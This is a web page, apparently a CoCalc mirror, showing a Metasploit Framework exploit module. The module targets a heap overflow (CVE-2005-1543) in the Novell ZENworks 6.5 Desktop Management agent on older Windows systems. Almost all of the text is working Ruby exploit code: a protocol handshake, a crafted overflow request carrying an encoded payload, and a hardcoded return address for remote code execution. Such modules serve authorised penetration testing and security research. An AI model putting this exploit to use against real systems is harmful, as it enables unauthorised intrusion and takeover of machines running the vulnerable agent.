Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/novell/zenworks_desktop_agent.rb
19639 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Novell ZENworks 6.5 Desktop/Server Management Overflow',

16
        'Description' => %q{

17
          This module exploits a heap overflow in the Novell ZENworks

18
          Desktop Management agent. This vulnerability was discovered

19
          by Alex Wheeler.

20
        },

21
        'Author' => [ 'Unknown' ],

22
        'License' => BSD_LICENSE,

23
        'References' => [

24
          [ 'CVE', '2005-1543'],

25
          [ 'OSVDB', '16698'],

26
          [ 'BID', '13678'],

27


28
        ],

29
        'Privileged' => true,

30
        'Payload' => {

31
          'Space' => 32767,

32
          'BadChars' => "\x00",

33
          'StackAdjustment' => -3500,

34
        },

35
        'Platform' => %w{win},

36
        'Targets' => [

37
          [

38
            'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent',

39
            {

40
              'Platform' => 'win',

41
              'Ret' => 0x10002e06,

42
            },

43
          ],

44
        ],

45
        'DisclosureDate' => '2005-05-19',

46
        'DefaultTarget' => 0,

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54
  end

55


56
  def exploit

57
    connect

58


59
    hello = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77"

60
    print_status("Sending version identification")

61
    sock.put(hello)

62


63
    pad = Rex::Text.rand_text_alphanumeric(6, payload_badchars)

64
    ident = sock.get_once

65
    if !(ident and ident.length == 16)

66
      print_error("Failed to receive agent version identification")

67
      return

68
    end

69


70
    print_status("Received agent version identification")

71
    print_status("Sending client acknowledgement")

72
    sock.put("\x00\x01")

73


74
    # Stack buffer overflow in ZenRem32.exe / ZENworks Server Management

75
    sock.put("\x00\x06#{pad}\x00\x06#{pad}\x7f\xff" + payload.encoded + "\x00\x01")

76


77
    ack = sock.get_once

78
    sock.put("\x00\x01")

79
    sock.put("\x00\x02")

80


81
    print_status("Sending final payload")

82
    sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))

83


84
    print_status("Overflow request sent, sleeping for four seconds")

85
    select(nil, nil, nil, 4)

86


87
    handler

88
    disconnect

89
  end

90
end

91


92